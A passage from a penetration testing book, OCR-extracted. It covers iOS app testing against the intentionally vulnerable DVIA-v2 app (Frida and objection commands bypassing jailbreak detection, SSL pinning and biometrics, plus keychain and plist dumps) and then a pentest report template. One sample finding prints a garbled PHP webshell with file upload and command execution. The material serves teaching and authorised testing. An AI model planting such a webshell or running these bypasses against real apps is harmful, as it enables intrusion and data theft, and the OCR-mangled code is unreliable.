modified code. 


e Semi-untethered Jailbreak: In that, it enables the device to start up on its own, a semi- 
untethered jailbreak is similar to an untethered jailbreak. Each time a device starts, the 
startup procedure remains the same, and it enters its default, non-jailbroken state. 
However, the user can re-jailbreak their cellphone using an app that runs on their device 
rather than a computer, as in a tethered or semi-tethered situation. 


The jailbreak procedure is straightforward and takes 2 to 5 minutes. The following tools can be 
used to jailbreak specific iOS versions. Refer to Figure 11.7: 
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Figure 11.7: Jailbreak tools 


Jailbreak provides a tool for IOS version 15, and the higher is Zeon. You can download it 
from https://zeon-app.com/ to set up the environment. 


The tools, scripts, and applications needed to begin learning iOS applications will be covered in 
this part. Please be aware that there are numerous tools and scripts available. This article may not 
cover all of them; thus, it is advised that you investigate each one independently. 


Be aware that testing iOS applications are advised to be done on a physical device. I use a 
variety of iPhone 7 and iPhone 12 mini devices. Additionally, make sure the auto-updates are off 
to prevent acquiring the most recent version while you wait for a jailbreak. 


A virtual device can be obtained by visiting https://www.corellium.com/. 


Vulnerable application 


Use the following vulnerable applications and install them in the designated repositories by 


following the instructions provided: 


e DVIA-v2: https://github.com/prateek147/DVIA-v2i 
e GOAT: https://github.com/OWASP/igoat. We will be using the DVIA-v2 application. 


Testing methodology 


When doing a penetration test on an iOS application, several elements are involved. Static 
analysis using manual methods and tools like MobSF is one of the components. Another element 
involves runtime exploitation, which entails hooking various methods and objects to get around 
obstacles and obtain sensitive data. Testing the dynamic API calls, such as login API requests 
and others, that the application generates last. 


In order to extract the IPA from the iOS application, we will first run a static analysis on it using 
MobSF. Then, we will examine a number of bypassing techniques, such as the Jailbreak 
Detection Bypass, SSL Pinning Bypass, Local Authentication Bypass, and so on. 


Extracting the IPA 


There are many ways to extract the IPA file; however, for the purposes of this essay, we will use 
SSH. 


The steps to extract the IPA are as follows: 


SSH connection to your iPhone: ssh root@ip (Default Password is Alpine) 
Go to the directory listed here: /var/containers/Bundle/Application 

Now look for the application: find | grep “app_name” 

Go to the folder where your app is located: cd <app_directory> 

Make a directory called Payload: mkdir Payload 

Transfer the data to the Payload directory: cp -r <appname.app>/ Payload/ 
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IPA-format the Payload directory after zipping it: zip -r /var/root/<appname>.ipa 
Payload/ 


Running static analysis with MobSF 


MobSF static analysis comes after the extraction of the IPA file. Despite the fact that you can use 
an install or any other available installation technique, we will be using the MobSF docker 
option. 

e MobSF: https://github.com/MobSF/Mobile-Security-Framework-MobSF 

e¢ MobSF Documentation: https://mobsf.github.io/docs/#/ 


To perform the static analysis, follow the given steps: 


1. Run the MobSF Web interface 
2. Drop the IPA file and run the static analysis 


3. Once the static analysis is complete, search for configuration errors, such as: 


a. Insecure URL schemes, as shown in Figure 11.8: 
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Figure 11.8: Insecure URL schemes 


b. Insecure permissions and ATS misconfiguration, as shown in Figure 11.9: 
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Figure 11.9: Insecure permissions 


c. Insecure binary options, as shown in Figure 11.10: 
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Figure 11.10: Insecure binary options 


d. Firebase database, hardcoded information, and e-mails, as shown in Figure 11.11: 


Figure 11.11: Firebase database, e-mails, and hardcoded information 


e. Other interesting files such as Assets, Resources, Debug Info, and Native and Non- 
Native Libs. 


Setting up proxy 


The Burp Suite’s proxy configuration method is rather easy to understand and implement. 
Follow the given steps: 


1. In the Wi-Fi setting, enable manual proxy and enter the proxy information, as shown in 
Figure 11.12: 
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Figure 11.12: Wi-Fi setting 


2. Go to Proxy Settings in the Burp Suite and change the listener to All Interfaces, as 
shown in Figure 11.13: 
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Figure 11.13: Proxy settings 


3. Now, on the iPhone, open http: //burp and download the CA certificate. 
4. Install the CA certificate. 


5. Now, navigate to Settings | General | About | Certificate Trust Settings and enable 
Portswigger CA Certificate, as shown in Figure 11.14: 
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Figure 11.14: Proxy certificate 


Bypassing Jailbreak detection 


For this demonstration, we will consider a variety of choices for bypassing Jailbreak using Frida 
and Objection Tools. Keep in mind that the status of the device is Jailbroken, as shown in Figure 
IL 15: 


Jailbreak Detection 


Device is Jailbroken 


Figure 11.15: Device is Jailbroken 


Using Frida 


1. Run the following command on your system: frida — codeshare _ rodnt/ios- 
jailbreak-bypass -f DVIA-v2. 


2. Go back to the application and select Jailbreak 1, then note that the jailbreak detection 
has been disregarded, as shown in Figure 11.16: 
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Figure 11.16: Device is not Jailbroken using Frida 


Using objection 


1. Run the following commands on your system, as shown in Figure 11.17: 
objection -g DVIA-v2 explore 
ios jailbreak disable 


Figure 11.17: Objection commands 


2. Go back to the application and select Jailbreak 1, then note that the jailbreak detection 
has been disregarded, as shown in Figure 11.18: 
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Figure 11.18: Device is not Jailbroken using objection 
The following list includes a variety of tools that can be used to avoid jailbreak detection: 


e Liberty Lite: https://yalujailbreak.net/liberty-lite/ 
e A-Bypass: https://repo.co.kr/package/com.rpgfarm.a-bypass 


Bypassing SSL pinning 


Let us now see how we can bypass the SSL Pinning using various methods. 


Using Objection 


1. Run the following commands on your system, as shown in Figure 11.19: 
objection -g DVIA-v2 explore 
ios sslpinning disable 


Figure 11.19: SSLPinning disable using objection 


2. Next, go to the program and select Send Using Certificate Pinning under Network 
Layer Security. 


3. Note that data can be intercepted by avoiding SSL Pinning. Refer to Figure 11.20: 
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Figure 11.20: Proxy settings 
The following list includes a variety of tools that can be used to avoid jailbreak detection: 


e Frida: https://codeshare.frida.re/ 


e SSLKillSwitch2: https://github.com/nabla-c0d3/ssI-kill-switch2 


Bypassing biometric (local) authentication 


Let us now see how we can bypass biometric (local) authentication using various methods. 
Using objection 
1. Run the following commands on your system, as shown in Figure 11.21: 


objection -g DVIA-v2 explore 
ios ui biometrics_bypass exit 


Figure 11.21: Bypassing biometric using objection 


2. Next, open the app and select Touch/Face ID Bypass | Start Challenge | Swift 
Implementation, as shown in Figure 11.22: 
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Figure 11.22: Face not recognized 


3. When the application prompts you with Face Not Recognized, select Cancel to avoid 
authentication, as shown in Figure 11.23: 
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Figure 11.23: Authentication successful 


Checking for sensitive data exposure in local 


The sensitive data is kept in local storage in a number of different locations. The different 
locations where you can locate sensitive data and how to launch an attack are listed as follows. 


Open the DVIA-v2 application, then select Local Data Storage. Save some data using each of 
the available choices. 


Sensitive data in Plist 


Case 1: Store sensitive data in Plist. 
Follow the given steps: 


1. Run the following commands: 
objection -g DVIA-v2 explore 
env 
cd /var/mobile/Containers/Data/Application/<app-id>/Documents 
ios plist cat userInfo.plist 


2. Keep in mind that the sensitive data is kept as plain text, as shown in Figure 11.24: 


Figure 11.24: iOS plist cat userInfo.plist command 


Case 2: Store Sensitive Data in UserDefaults 
Follow the given steps: 
1. Run the following commands: 


objection -g DVIA-v2 explore 
ios nsuserdefaults get 


2. You can see that the sensitive data is contained in the DemoValue parameter as plain text, 
as shown in : 


Figure 11.25: iOS “nsuserdefaults get” command 


Sensitive data in keychain 
Case 3: Store sensitive data in keychain 


Follow the given steps: 


1. Run the following commands: 
objection -g DVIA-v2 explore 
ios keychain dump 

2. Take note that the password is saved in plain text as sensitive data (Super Secure 
Password), as shown in Figure 11.26: 


Figure 11.26: iOS keychain dump command 


For the remaining attacks, we will employ _ the Grapefruit —_ tool 
(https://github.com/ChiChou/grapefruit). Installing, starting, and connecting your iPhone to 
the application. 


Sensitive data in core data 


Case 4: Store sensitive data in core data 
Follow the given steps: 


1. Open Grapefruit and load the DVIA-v2 application. Go to the following: Data | Library | 
Application Support. 


2. Open Model.sqlite. 
3. Be aware that private data is reachable. Refer to Figure 11.27: 
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Figure 11.27: Sensitive data in core data 


Sensitive data in couchbase lite 
Case 5: Store sensitive data in couchbase lite 
Follow the given steps: 
1. Load the DVIA-v2 application with Grapefruit and navigate to the following: Data | 
Library | Application Support | CouchbaseLite | dvcouchbasedb. cblite2. 


2. Download db.sqlite3, open it, and you will be able to see the sensitive information. 


Sensitive data in YapDatabase 


Case 6: Store sensitive data in YapDatabase 
Follow the given steps: 
1. Load the DVIA-v2 application with Grapefruit and navigate to the following: Data | 
Library | Application Support. 
2. Download YapDatabase.sqlite and open it with SQLite Viewer. 
3. You will be able to access sensitive data. 


OWASP mobile top 10 


The OWASP mobile top 10 is a ranking of the security threats that mobile applications face, 
compiled from research and user feedback. 


M1: Improper platform usage 


The first OWASP mobile top 10 category focuses on the areas where an attacker may abuse the 
security features offered by the iOS platform. Additionally, several security vulnerabilities may 
occasionally develop as a result of improper platform feature implementation. 


Under this area, a number of components, including Biometric Authentication, Keychain, 
Platform Permission, and so on, must be examined. 


M2: Insecure data storage 


Many times, iOS applications save certain data locally in various parts. If an attacker gains 
access to the user’s physical device, there is a potential that sensitive data will be saved locally 
and could be used against the user. 


Here are a few examples of the general dangers that fall into this category: 


e Sensitive data stored in Plist 

e Sensitive data stored in UserDefaults 
e Sensitive data stored in Keychain 

e Sensitive data stored in core data 


e Sensitive data stored in Webkit Caching 


e Sensitive data stored in Realm 

e Sensitive data stored in Couchbase Lite 

e Sensitive data stored in YapDatabase 

e URL caching (both request and response) 
e Keyboard press caching 

e Copy/paste buffer caching 

e Insecure logging 

e Background screen caching 


e Analytics data sent to third parties 


M3: Insecure communication 


Client-server architecture is used for communication in the iOS application. An attacker can try 
to steal critical information over unencrypted checks, perform Man-in-the-Middle attacks, or try 
to study the request and answer by capturing them using proxy tools like Burp Suite due to faulty 
or inadequate implementation of communication standards like communication over HTTP. 


Here are a few examples of the general dangers that fall into this category: 


e Lack/bypass-able SSL pinning 
e¢ Communication over HTTP [unencrypted communication] 
e Plain-text submission of sensitive information 


e Logging sensitive information in the logs 


M4: Insecure authentication 


Applications are typically categorized as having insecure authentication when they either 
improperly handle authentication checks or permit attackers to modify login/authentication 
requests in order to access the target user’s account. 


Here are a few examples of the general dangers that fall into this category: 


e Guessable/weak/default credentials 


e Authentication bypass using attacks such as injection attacks 


M5: Insufficient cryptography 


The user data is frequently stored by iOS applications or used in various client-server queries. An 
attacker may try to access data that is encrypted using a weak cryptographic approach due to a 
lack of strong cryptography and obtain sensitive data in this way. 


Here are a few examples of the general dangers that fall into this category: 


e Stealing app and user data 
e Accessing encrypted files 


e Accessing encrypted client-server request endpoints 


Mé6: Insecure authorization 


Insecure authorization and unreliable authentication are frequently two checks that lead to 
confusion. In this attack, it is discussed how to carry out attacks that are outside the user’s level 
of power and access by taking advantage of the poorly implemented user authorization checks. 


Here are a few examples of the general dangers that fall into this category: 


e IDOR 
e Privilege escalation 


e Direct request 


M7: Client code quality 


Because of the frequently poor code quality, an attacker may try to send the carefully constructed 
inputs to function calls made within an app in an effort to execute them or watch the behavior of 
the program. It might cause some application malfunctions and exploitable situations. 


Here are a few examples of the general dangers that fall into this category: 


e Format string vulnerabilities 
e Buffer overflows 
e Remote code execution 


e Memory exhaustion 


M8: Code tampering 


An attacker may try to modify the application code and inject malicious code, such as a 
backdoor, and distribute it using the App Store and other methods, which could result in the theft 
of sensitive information and compromise of the user’s device as well if the application does not 
implement the code tampering checks. 


Here are a few examples of the general dangers that fall into this category: 


e Malware injection 
e Stealing sensitive data 


e Persistent backdoor 


M9: Reverse engineering 


In order to comprehend the application’s code patterns, various function implementations, and to 
carry out bypass/attacks using a runtime and dynamic instrumentation methodologies, the reverse 
engineering approach entails studying the binaries and their code using tools like Hopper, otool, 
and IDA Pro. 


One of the typical instances is to examine how SSL Pinning logic is implemented, comprehend 
the functions responsible for pinning checks, and then use tools like Frida to go around it by 
creating a custom logic script. 


M10: Extraneous functionality 


Typically, the development team stores code before sending an application to production to 
allow for simple access to the backend server, to provide logs for error analysis, or to store 
staging and testing information. This code is not necessary for the app to operate. In essence, it is 
only necessary during the development phase and has no use for the intended usage once the app 
is in production. 


In some circumstances, this code may contain data about databases, user information, user rights, 
API endpoints, and so on, or it may disable features like two-factor authentication. 


Conclusion 


This chapter discussed the principles of iOS penetration testing as well as various methods for 
avoiding jailbreak detection bypass, biometrics bypass, SSL pinning bypass, and sensitive data 
exposure in the local storage. 


uestions 


1. How do you bypass SSL pinning? 

2. How do you bypass jailbreak detection? 
3. How bypass biometrics? 
4. 


How is the exposure to sensitive data in the local storage? 


CHAPTER 12 
Reporting 


Introduction 


We have finally reached the final chapter. Congratulations! You have completed reading the 
entire book. But before we can rejoice, we need to address one of the most crucial aspects of our 
wireless penetration test and how to write a professional report for wireless penetration testing. 


Structure 


The following topics will be covered in this chapter: 


e Report writing 
e Report writing stages 
e Penetration testing report sample 


Objectives 


In this chapter, you will be able to understand how to write a professional penetration testing 
report. 


Report writing 


Writing a report for a penetration test involves many different tasks, including methodology, 
processes, a correct description of the report’s content and design, a thorough example of the 
report, and the tester’s own experiences. When the report is finished, it is distributed to the 
technical team and senior management of the target firms. This report is used as a guide if any 
future needs of this nature arise. 


Report writing stages 


Writing a penetration report involves extensive writing, which is divided into the following 
stages, as further illustrated in Figure 12.1: 


e Report planning 

e Information collection 
e Writing the first draft 

e Review and finalization 


Information Writing the 


' Collection First Draft 
| 
Report | : Review and | 
Planning | R Finalization | 
| eport | 
Writing 
Stages 


Figure 12.1: Report writing stages 


Report planning 


Planning a report begins with the objectives, which aid readers in comprehending the key 
findings of the penetration testing. This section explains the purpose of the testing, the 
advantages of pen testing, and so on. Second, the time needed for testing is included in the report 
planning process. 


Major elements of report writing are as follows: 


Objectives: It explains the general goal and advantages of pen testing. 


Time: The inclusion of time is crucial because it provides the system’s actual status. 
Imagine that this report will protect the tester if something goes wrong later because it 
will show the risks and vulnerabilities present in the penetration testing scope at the time 
in question. 


Target audience: Target audiences such as information security managers, information 
technology managers, the chief information security officer, and the technical team should 
also be included in pen testing reports. 


Report classification: It needs to be appropriately classified because it contains highly 
secret information such as server IP addresses, application details, vulnerabilities, and 
threats. However, the target organization’s information categorization policy must be 
taken into consideration while classifying the information. 


Report distribution: The number of copies and report distribution should be mentioned 
in the scope of the work. It also needs to mention that the hardcopies can be controlled by 
printing a limited number of copies attached with their number and the receiver’s name. 


Information collection 


Pen testers must list each step to ensure that they have gathered all the information at all testing 


stages because the procedures are intricate and time-consuming. Along with the methodologies, 
he must also provide the tools and systems, scan results, vulnerability analyses, specifics of his 
discoveries, and so on. 


Writing the first draft 


Once the tester is equipped with the necessary resources, he must now begin writing the first 
draught. He must compose the first draught in great detail, including all of the activities, 
procedures, and experiences. 


Review and finalization 


The report must be examined after it has been written, first by the drafter and then by any 
mentors or colleagues who may have helped. It is required of the reviewer to go through the 
report in depth and look for any errors that need to be fixed. 


Content of penetration testing report 
The typical order format of a penetration testing report is as follows: 
e Executive summary 


o Scope of work 

o Project objectives 

o Assumption 

o Timeline 

o Summary of findings 


© Summary of recommendation 
e Methodology 


o Planning 

o Exploitation 

o Reporting 
e Detail findings 


© Detailed systems information 


o Windows server information 
e References 


o Appendix 


Penetration testing report sample 


This section illustrates the different pages within a penetration testing report sample. 


1. Page 1 is illustrated in Figure 12.2: 


<TEAM LOGO/NAME> 


<YEAR> Penetration Testing 
Report Prepared For 


<REPLACE WITH CLIENT LOGO - CHANGE COLORS TOO> 


Report Issued: <TEST DATE> 


Sensitive: The information in this document is strictly confidential and is intended for <COMPANY NAME> 


Figure 12.2: Penetration testing report Page 1 


2. Page 2 is illustrated in Figure 12.3: 


Confidentiality Notice 


This report contains sensitive, privileged, and contidentia! information. Precautions should be 
taken to protect the contidentiality of the information in this document. Publication of this report 
may cause reputational damage to <CLIENT NAME> or facilitate attacks against <CLIENT 
NAME>. <TEAM NAME> shail not be held liable for special, incidental, collateral or 
consequential damages arising out of the use of this information. 


Disclaimer 


Note that this assessment may not disclose all vulnerabilities that are present on the systems 
within the scope of the engagement. This report is a summary of the findings from a “point-in- 
time” assessment made on <CLIENT NAME>'s environment. Any changes made to the 
environment during the period of testing may atfect the results of the assessment. 
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3. Page 3 is illustrated in Figure 12.4: 


TABLE OF CONTENTS 


EXECUTIVE SUMMARY 
<Optional - Big Issue> Recommendation 


HIGH LEVEL ASSESSMENT OVERVIEW 
Observed Security Strengths 
Areas for Improvement 
Short Term Recommendations 
Long Term Recommendations 


SCOPE 
Networks 
Other 
Provided Credontials 


TESTING METHODOLOGY 


CLASSIFICATION DEFINITIONS 
Risk Classifications 
Exploitation Likelihood Classifications 
Business Impact Classifications 
Remediation Difficulty Classifications 


ASSESSMENT FINDINGS 
APPENDIX A - TOOLS USED 


APPENDIX B - ENGAGEMENT INFORMATION 
Client Information 
Version Information 
Contact Information 
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4. Page 4 is illustrated in Figure 12.5: 


Page 3 
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<TEAM NAME> performed a security assessment of the intemal corporate network of <CLIENT 
NAME> on <TEST DATE>, <TEAM NAME>'s penetration test simulated an attack from an 
external threat actor attempting to gain access to systems within the <CLIENT NAME> 
corporate network. The purpose of this assessment was to discover and identify vulnerabilities 
in <CLIENT NAME>’s infrastructure and suggest methods to remediate the vulnerabilities. 
<TEAM NAME> identified a total of <VULN TOTAL NUM> vulnerabilities within the scope of the 
engagement which are broken down by severity in the table below, 


CRITICAL 


The highest severity vulnerabilities give potential attackers the opportunity to <BAD ACTIONS 
THAT COULD OCCUR HERE - FULL PARAGRAPH WITH HIGH-LEVEL DETAIL>. In order to 
ensure data confidentiality, integrity, and availability, security remediations should be 
implemented as described in the security assessment findings. 


Note that this assessment may not disclose all vulnerabilities that are present on the systems 
within the scope. Any changes made to the environment during the period of testing may affect 
the results of the assessment. 


<Optional - Big Issue> Recommendation 


This is an optional paragraph that discusses a very critical series of business failures (e.g. 
failure to adhere to applicable legal regulations) that isn't a technical vulnerability but still should 
be brought to the attention of the executive team. 
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5. Page 5 is illustrated in Figure 12.6: 


HIGH LEVEL ASSESSMENT OVERVIEW 


Observed Security Strengths 


<TEAM NAME> identified the following strengths in <CLIENT NAME>'s network which greatly 
increases the security of the network, <CLIENT NAME> should continue to monitor these 
controls to ensure they remain effective. 
<Strength Category> 
« Great thing we saw here that causes us |ssues {which is a good thing) 
¢ Lorem ipsum dolor sit amet, consectetur adipiscing olit, sed do eiusmod tempor 
incididunt ut labore et dolore magna aliqua. 


Areas for Improvement 


<TEAM NAME> recommends <CLIENT NAME> takes the following actions to improve the 
security of the network. Implementing these recommendations will reduce the likelinood that an 
attacker will be able to successfully attack <CLIENT NAME>'s information systems and/or 
reduce the impact of a successful attack. 


Short Term Recommendations 

<TEAM NAME> recommends <CLIENT NAME> take the following actions as soon as possible 
to minimize business risk. 

<Recommendation Category> 


« <Individual Recommendation> 
¢« Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor 
incididunt ut labore et dolore magna aliqua. 


Long Term Recommendations 


<TEAM NAME> recommends the following actions be taken over the next <NUM> months to fix 
hard-to-remediate issues that do not pose an urgent risk to the business. 
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6. Page 6 is illustrated in Figure 12.7: 


<Recommendation Category> 


« = <Individual Recommendation> 
« Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor 
incididunt ut labore et dolore magna aliqua. 
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7. Page 7 is illustrated in Figure 12.8: 


SCOPE 


Alltesting was based on the scope as defined in the Request For Proposal (RFP) and official 
written communications. The items in scope are listed below. 


Networks 


Network Note 


10.0.1.0/24 Network for Corporate HQ 
10.0.2.0/24 Gotham, NY, branch site 


Other 


Name System Type Note 


Provided Credentials 


<CLIENT NAME> provided <TEAM NAME> with the following credentials and access to 
facilitate the security assessment listed below. 


ltem Not 


e 
CustomerAccount | (testuser@example.com) A fake customer account in the XXXX 
application for testing functionality that requires authentication. 


IVR Testing Phone | (555-555-5678) Specific phone to use for IVR system testing. 


<CLIENT NAME> CONFIDENTIAL Page 7 


Figure 12.8: Penetration testing report Page 7 


8. Page 8 is illustrated in Figure 12.9: 


TESTING METHODOLOGY 


<TEAM NAME GOES HERE>'s testing methodology was split into three phases: 
Reconnaissance, Target Assessment, and Execution of Vulnerabilities. During recomaissance, 
we gathered information about <CLIENT NAME>'s network syslems. <TEAM NAME GOES. 
HERE> used port scanning and other enumeration methods to refine target information and 
assess target values. Next, we conducted our targeted assessment. <TEAM NAME GOES 
HERE> simulated an attacker exploiting vulnerabilities in the <CLIENT NAME> network. 
<TEAM NAME GOES HERE> gathered evidence of vulnerabilities during this phase of the 
engagement while conducting the simulation in a manner that would not disrupt normal 
business operations, 


The following image is a graphical representation of this methodology. 


Planning 
°Plan workflow \ 
*Establah scope 
/ . *Research targets / \ 
Documentation y fj Target Acquisition : 
Evidence Collection r oNenwork scanning 
eanatysts of findings 005 fingerprinting / 
Service identitkation =—/ 


\\ *Presentation of findings / 


————, Team \ 


Methodology J/au=uumas 


Post Exploitetion 


/ \ ; Pre-Exploiation : ¥ 
oEscolute privileges ‘a \ 
¢ eee interna! / 4 ype an ; 
\ vdeniih bad iit — / 
\ Target _ i 
eEmamerate users 
eCompromise credentials 
oEstabish system access 
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9. Page 9 is illustrated in Figure 12.10: 


CLASSIFICATION DEFINITIONS 


Risk Classifications 


Description 


The vulnerability poses an immediate threat to the 
organization. Successful exploitation may permanently affect 
the organization. Remediation should be immediately 
performed. 


The vulnerability poses an urgent threat to the organization, 
and remediation should be prioritized. 


Successful exploitation is possible and may result in notable 
disruption of business functionality. This vulnerability should 
be remediated when feasible. 


The vulnerability poses a negligible/minimal threat to the 
organization. The presence of this vulnerability should be 
noted and remediated if possible. 


: These findings have no clear threat to the organization, but 
Informational may cause business processes to function differently than 
desired or reveal sensitive information about the company. 


Exploitation Likelihood Classifications 


Likelihood Description 


Exploitation methods are well-known and can be performed using 
publicly available tools. Low-skilled attackers and automated tools 
could successfully exploit the vulnerability with minimal difficulty 


Exploitation methods are well-known, may be performed using 


public tools, but require configuration. Understanding of the 
underlying system is required for successful exploitation 


Exploitation requires deep understanding of the underlying 
systems or advanced technical skills. Precise conditions may be 
required for successful exploitation 
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Page 10 is illustrated in Figure 12.11: 


Business Impact Classifications 


Impact Description 


Successful exploitation may result in large disruptions of critical 
business functions across the organization and significant financial 
damage. 


Successful exploitation may cause significant disruptions to non- 
critical business functions, 


Successful exploitation may affoct fow usors, without causing 
much disruption to routine business functions. 


Remediation Difficulty Classifications 


Difficulty Description 


Remediation may require extensive reconfiguration of underlying 
systems that is time consuming. Remediation may require 
disruption of normal business functions. 


Remediation may require minor reconfigurations or additions that 
may be time-intensive or expensive 


Remediation can be accomplished in a short amount of time, with 
little difficulty. 
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11. Page 11 is illustrated in Figure 12.12: 


ASSESSMENT FINDINGS 


Number Finding Risk Score 


TEMPLATE NOTE: (Sorting by descending risk score) 
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12. Page 12 is illustrated in Figure 12.13: 


1 - Example Vulnerability Finding 


HIGH RISK (8/10) 


Security Implications 
This is where you give a 1-2 sentence description about the major impact of the finding. This 
finding is very important because it can destroy the entire business if left unchecked. 


Analysis 

Longer discussion of the finding. Includes screenshots. Lorem ipsum dolor sit amet, consectetur 
adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad 
minim veniam, quis nostrud exercitation ullamco labors nisi ut aliquip ex ea commodo 
consequat. Duis aute irure dolor in reprehendent in voluptate velit esse cillum dolore eu fugiat 
nulla pariatur, Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt 
mollit anim id est laborum (see Appendix 1). 


(Grrédal _ 

@rror reporting (NULL) 

$me=$ SERVER('PEP SELF’) 

SNameF=$ REQUEST| ' Name’) 

$nowaddress='<input typeshidden namesaddress value="' .getcwd().*">' 

Spass up*"al375)fle2bd469210135232774£c5£" 

Af (Asset (S FILES("elit™)) and 

$ FILES["elif"}["error™} } 

move uploaded file($ FILES("elif™}["tmp_name"), $ _FILES("elif™)(“name"}) 

echo $ifupload=" Ite0k ~ 

Af (mdS($ REQUEST['ssp')) 

=Spass up) 

print "<title>403 Forbidden</title><hl>Forbidden</hl><p>You don't have permission to 
access “.$ SERVER('PHP_SELF’}." on this server </p>” 

exit() 

$ SESSION('LoGin' Jetrue 

echo “<form action=$me method=post enctype=multipart/form-data> $nowaddress <isput 
type=file same=elif ><input type=subait value=Upload /></form” 


<?php echo ayatem($ GET["cad™}): 7> 


Figure 2.3.1: A pho webshell uploaded to XYZ Application 
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13. Page 13 is illustrated in Figure 12.14: 


Recommendations 
e Remove XYZ to meke things more secure 
« Ifyou can not remove XYZ do this... 


References (opt) 


e = https://github.com/Sevaarcen/RADARAree/master/radariplaybooks 
e = https://owasp org/www-project-top-ien/ 
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14. Page 14 is illustrated in Figure 12.15: 


APPENDIX A - TOOLS USED 


TOOL DESCRIPTION 


BurpSuite Community Edition | Used for testing of web applications. 
Used for exploitation of vulnerable services and vulnerability scanning. 


[nmap [sree rt on ot 
Used to scan the networks for vulnerabilities. 
PostgreSQL Client Tools Used to connect to the PostgreSQL server. 


Table A.1: Tools used during assessment 
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15. Page 15 is illustrated in Figure 12.16: 


APPENDIX B - ENGAGEMENT INFORMATION 


Client Information 


Primary Contact <Person Name>, 
<Person's Title> 


Approvers The following people are authorized to change the scope of 
engagement and modify the terms of the engagement 
e <PERSON NAME 1> 
@ <PERSON NAME 2> 


Version Information 


Version Date Description 


Contact Information 


[Name <TEAM NAME> Consulting 
1001 Fake Street, Gotham, NY 11201 


Emit <REPLACE WITH PROVIDED EMAIL> 
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Conclusion 


In this chapter, we went over how to plan a report and how to write one from scratch. It can be 
difficult to write a report at times, but once you get the feel of it, you will write reports like a 
professional. 


It is my responsibility as the author to give you, my reader, the finest possible reading 
experience. So now it is time for you! What do you think of this book? Have you learned more 
than you expected? Was it too complicated or difficult to understand? Did it not offer enough 
practical examples? Did it seem to you that something was left out? Please feel free to contact 
me through the https://www.bpbonline.com page of BPB Online. See you on the other side! 
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